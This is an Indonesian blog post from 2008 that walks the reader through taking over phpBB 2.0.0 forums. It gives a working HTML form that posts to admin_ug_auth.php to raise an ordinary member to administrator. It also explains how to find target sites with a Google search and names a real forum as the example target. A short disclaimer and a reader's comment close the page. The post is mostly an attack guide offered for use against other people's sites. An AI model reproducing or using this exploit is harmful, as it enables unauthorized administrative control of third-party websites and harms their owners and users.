Di dalam forum phpBB 2.0.0 file admin_ug_auth.php digunakan untuk mengatur permission dari seorang anggota termasuk admin forum tersebut. Error scripting yang terdapat pada file admin_ug_auth.php memungkinkan seorang user biasa/member mampu mengeskalasi/ memindahkan aksesnya menjadi setara administrator hanya dengan bantuan file HTML dan Internet Explorer. Sekarang buatlah satu file HTML dengan nama xphpbb.htm dengan source HTML seperti di bawah ini:
====================
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1252">
<title></title>
</head>
<body>
<form method="post"
action="http://www.nameforum.com/phpBB/admin/admin_ug_aut
h.php">
<p>User Level : <select name="userlevel">
<option value="admin"
selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit"
class="mainoption" />
<input type="reset" value="Reset" class="liteoption"
name="reset" />
</form>
</body>
</html>
====================
Selanjutnya cari situs yang memiliki forum phpBB 2.0.0 dengan menggunakan Google.com dengan keyword “Powered by phpBB 2.0.0,”.
Klik link dari target yang anda pilih dan pastikan bahwa versi forum phpBB tersebut adalah phpBB 2.0.0. Sekarang daftarkan diri anda sebagai member dengan mengklik link Register di forum tersebut. Isikan data Username, Email Address dan Password login sesuai keinginan anda. Untuk email pastikan anda menggunakan email asli, kadang beberapa forum phpBB dengan versi yang sama membutuhkan konfirmasi dengan mengirimkan kode aktivasi melalui email anda.
Sekarang taruh mouse Anda di atas link username yang Anda daftar, akan nampak di status Internet Explorer menampilkan alamat link seperti contoh berikut:
‘http://forums.casterclub.com/profile.php?mode=viewprofile&u=182’
Dari status yang ditampilkan di Internet Explorer kita bisa mengetahui bahwa nomor keanggotaan kita adalah 182 (u=182, User ID=182). Setelah mengetahui nomor keanggotaan kita, sekarang editlah file xphpbb.htm yang telah kita buat sebelumnya dengan Notepad kemudian ganti action forum-nya seperti di bawah ini:
Sebelumnya :
====================
<form method="post"action="http://www.nameforum.com/phpBB/admin/admin_ug_auth.php">
====================
Ganti dengan :
====================
<form method="post"action="http://forums.casterclub.com/admin/admin_ug_auth.php">
====================
Pastikan anda tidak salah menempatkan link actionnya. Beberapa forum menggunakan link forum yang berbeda misalnya seperti ini:
====================
http://www.myforum.com/phpBB2/index.php
====================
Jika anda menemukan hal seperti di atas maka sesuaikan actionnya sesuai link forum, contoh:
====================
<form method="post"action="http://www.myforum.com/phpBB2/admin/admin_ug_auth.php">
====================
Selanjutnya save xphpbb.htm yang telah diedit dan buka dengan menggunakan Internet Explorer.
Isi text box User ID dengan nomor keanggotaan kita, misalnya sesuai contoh di atas nomor keanggotaannya adalah 182. Selanjutnya tekan Submit.
Jika proses yang anda lakukan berjalan lancar, maka anda akan masuk di Panel Administrator Forum.
Jika telah berhasil masuk di Panel Administrator tersebut maka selamat anda telah berhasil menjadi Administrator forum. Untuk membuktikan bahwa Anda telah menjadi Administrator, klik link Configuration di bagian General Admin (menu sebelah kiri).
Demikianlah cara penjebolan forum phpBB versi 2.0.0. Semoga anda tidak memanfaatkan info yang anda serap dari artikel ini untuk melakukan tindakan yang merusak situs orang lain. Bekerjasamalah dengan Admin situs tersebut dengan memberikan informasi dan bantuan.
By ADRY-Z
Jumat, 25 Juli 2008
Teknik Menjebol “Forum phpBB 2.0.0”
Langganan:
Posting Komentar (Atom)
keren abiz, ka, punya tutorial mendisable tombol ctrl+alt+del/alt+f4 menggunakan php or javascript??
BalasHapuszeyn
black.capri@gmail.com